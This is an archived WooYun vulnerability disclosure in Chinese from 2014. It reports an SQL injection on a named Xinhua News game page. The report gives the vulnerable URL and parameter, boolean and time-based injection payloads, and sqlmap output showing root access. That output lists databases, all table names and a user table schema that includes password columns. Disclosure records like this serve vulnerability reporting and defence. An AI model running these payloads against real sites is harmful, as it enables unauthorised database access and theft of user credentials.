当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077868

漏洞标题:新华网某大型业务高危SQL注射全库泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-10-07 20:14

修复时间:2014-11-21 20:16

公开时间:2014-11-21 20:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-07: 细节已通知厂商并且等待厂商处理中
2014-10-11: 厂商已经确认,细节仅向厂商公开
2014-10-21: 细节向核心白帽子及相关领域专家公开
2014-10-31: 细节向普通白帽子公开
2014-11-10: 细节向实习白帽子公开
2014-11-21: 细节向公众公开

简要描述:

新华网某大型业务高危sql注射,全库泄露

详细说明:

新华网的游戏业务,全库泄露
注射点:

http://game.news.cn/shouyou/game_details.jsp?gameid=33582


注射参数 : gameid
sqlmap直接跑,ROOT权限

Place: GET
Parameter: gameid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gameid=33582 AND 7873=7873
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: gameid=33582 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] gpfxhw
[*] information_schema
[*] mysql
[*] test
current database:    'gpfxhw'
current user:    'root@localhost'
Database: gpfxhw
[237 tables]
+---------------------------+
| position                  |
| activitydownloadlog       |
| activitypvlog             |
| app_function              |
| app_role                  |
| app_user                  |
| area                      |
| associator                |
| associator_grade          |
| associator_grade_log      |
| backoutinfo               |
| blacklist                 |
| blacklistmobile           |
| brush_mobile              |
| brush_number              |
| brush_number_bak          |
| cardcontent               |
| cardgift                  |
| cardorder                 |
| cityip                    |
| citysort                  |
| clientpvlog               |
| clientuvlog               |
| cloginlog                 |
| collect                   |
| company                   |
| connectionorder           |
| cpcooperateinfo           |
| crandom                   |
| customer_comment          |
| customerdailyrecord       |
| department                |
| dictionary                |
| dictionary_type           |
| downcountday              |
| downcountlog              |
| downcountmonth            |
| downloaddetail            |
| downloadlog               |
| downloadlog_history       |
| editorrecommend           |
| errorcodeinfo             |
| exchangegood              |
| exchangegoodinfo          |
| file_attach               |
| firstactivelog            |
| floworderreport           |
| flowpackorder             |
| flowpackorder_history     |
| flowpackproduct           |
| freeflowgamelog           |
| freeflowgames             |
| freeflowgamesorderway     |
| game_hottag               |
| gamecomment               |
| gamedevelopers            |
| gamefocus                 |
| gamegrade                 |
| gameinfo                  |
| gameintegration           |
| gamelisttype              |
| gamepackage               |
| gamepackageorder          |
| gamepackagesoft           |
| gamepvlog                 |
| gameranklist              |
| gamereport                |
| gamereportorder           |
| gamereportunsubscribe     |
| gamescanresult            |
| gamesdk                   |
| gamesearchdefault         |
| gameseries                |
| gamess                    |
| gamesubject               |
| gamesubjectlog            |
| gamesubjectsoft           |
| gametag                   |
| gametypes                 |
| goodsinfo                 |
| gporder                   |
| gppayment                 |
| groupuserinfo             |
| hotgame                   |
| info                      |
| infoypes                  |
| inputmobile               |
| integrationinfo           |
| iosdowncountlog           |
| iosgameinfo               |
| iosgamepvlog              |
| iosgameuvlog              |
| iplibrary                 |
| keyword                   |
| lnvacbatchlogs            |
| lnvaccheckpricelogs       |
| loginlog                  |
| lotterycount              |
| lotteryinfo               |
| mailbox                   |
| mediacard                 |
| minipayment               |
| minipaymentdetail         |
| mo                        |
| mo_history                |
| mobileimsiid              |
| mobilerandom              |
| mobilesimimsi             |
| mobilesimimsi_20140212    |
| momessage                 |
| mt                        |
| mt_history                |
| mtcheckcountlog           |
| mtcheckcountlog_history   |
| mtids                     |
| mtprocess                 |
| myh5game                  |
| necessary                 |
| newdbsubifacelog          |
| newpaymentreturnlog       |
| newsdkpayment             |
| numtable                  |
| orderfreeflowsdk          |
| orderprop                 |
| orderrelationupdatenotify |
| orderremind               |
| orders                    |
| p_channel                 |
| p_gameactivity            |
| p_relation                |
| p_rhythmmaster            |
| p_scjzds_info             |
| p_scjzds_singup           |
| p_sms                     |
| p_summerwb                |
| pagegameorders            |
| pagegamepvlog             |
| pagekeyword               |
| pagepvchannel             |
| pagepvlog                 |
| pagepvlog_historybak      |
| pagepvlogmonth            |
| pagepvprovincelog         |
| pageuvlog                 |
| paychannel                |
| paymentreturnlog          |
| payrandom                 |
| paysdkcompany             |
| paysdkgame                |
| paysdkgametemp            |
| paysdkparam               |
| pcgamelog                 |
| pcgamepvlog               |
| posterinfo                |
| prepaidcards              |
| promotion                 |
| promotionrecord           |
| promotionrule             |
| province                  |
| proxyinfo                 |
| push_channel              |
| push_channelall           |
| push_channeldetail        |
| pushinfo                  |
| querygameinfo             |
| question                  |
| qy_medal                  |
| qy_news                   |
| random                    |
| recommend                 |
| registertype              |
| reservationmobile         |
| role_fun                  |
| scoreexchange             |
| scorelog                  |
| sdkchannel                |
| sdkchanneltype            |
| sdkchecklogs              |
| sdkcooperation            |
| sdkcooprel                |
| sdkincome                 |
| sdkincome_province        |
| sdkincomesmsdetail        |
| sdkincomesmsdetail_old    |
| sdkpayment                |
| sdkpayment_history        |
| sdkpaymentlog             |
| sdksmslog                 |
| sdkversion                |
| seriesbrand               |
| sgipheart                 |
| sharelog                  |
| sharesmslog               |
| sign                      |
| signintegration           |
| sjinfo                    |
| smsbykflog                |
| smscompanyinfo            |
| smscporder                |
| smscppayment              |
| smscprelation             |
| smskycallbacklog          |
| smskylog                  |
| smskymolog                |
| smskypaymentlog           |
| smslogs                   |
| smsorderconf              |
| smsorderconfbatch         |
| smspayerrorlogs           |
| smspayerrorlogs_history   |
| smsproductinfo            |
| smsreceive                |
| smsspecialnumber          |
| smszsmolog                |
| smszspaymentlog           |
| softgood                  |
| swpayment                 |
| swpaymentdetail           |
| swtemp                    |
| swtempdel                 |
| sysinterfacecfg           |
| sysparam                  |
| system_param              |
| systeminfo                |
| taxmanagement             |
| thirdpayment              |
| thirdpaymentdetail        |
| timertaskresult           |
| unicomsmslogs             |
| useintegral               |
| user_role                 |
| usermessage               |
| usertable                 |
| vote                      |
| winprizeinfo              |
| wochannel                 |
| wogameinfo                |
+---------------------------+
Database: gpfxhw
Table: app_user
[26 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| accessionTime | datetime     |
| addres        | varchar(500) |
| channelid     | varchar(3)   |
| dep_id        | bigint(20)   |
| developerid   | varchar(20)  |
| developername | varchar(50)  |
| edu_id        | bigint(20)   |
| email         | varchar(100) |
| emailPassword | varchar(100) |
| fax           | varchar(100) |
| file_id       | bigint(20)   |
| fullName      | varchar(100) |
| leftFlag      | int(11)      |
| mobile        | varchar(100) |
| password      | varchar(100) |
| phone         | varchar(100) |
| pos_id        | bigint(20)   |
| province      | varchar(20)  |
| remark        | varchar(200) |
| sex           | int(11)      |
| status        | int(11)      |
| tellimit      | int(11)      |
| tralimit      | int(11)      |
| userId        | bigint(20)   |
| userName      | varchar(100) |
| zip           | varchar(100) |
+---------------+--------------+

漏洞证明:

如上

修复方案:

自行修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-10-11 17:13

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-09-30 10:37 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    好屌的黑客。。。能拖出来嘛

  2. 2014-09-30 10:37 | Solomon ( 实习白帽子 | Rank:42 漏洞数:5 | 玩笑而已,厂商勿怪!!!)

    又一个面试没过的小盆友在泄愤吗?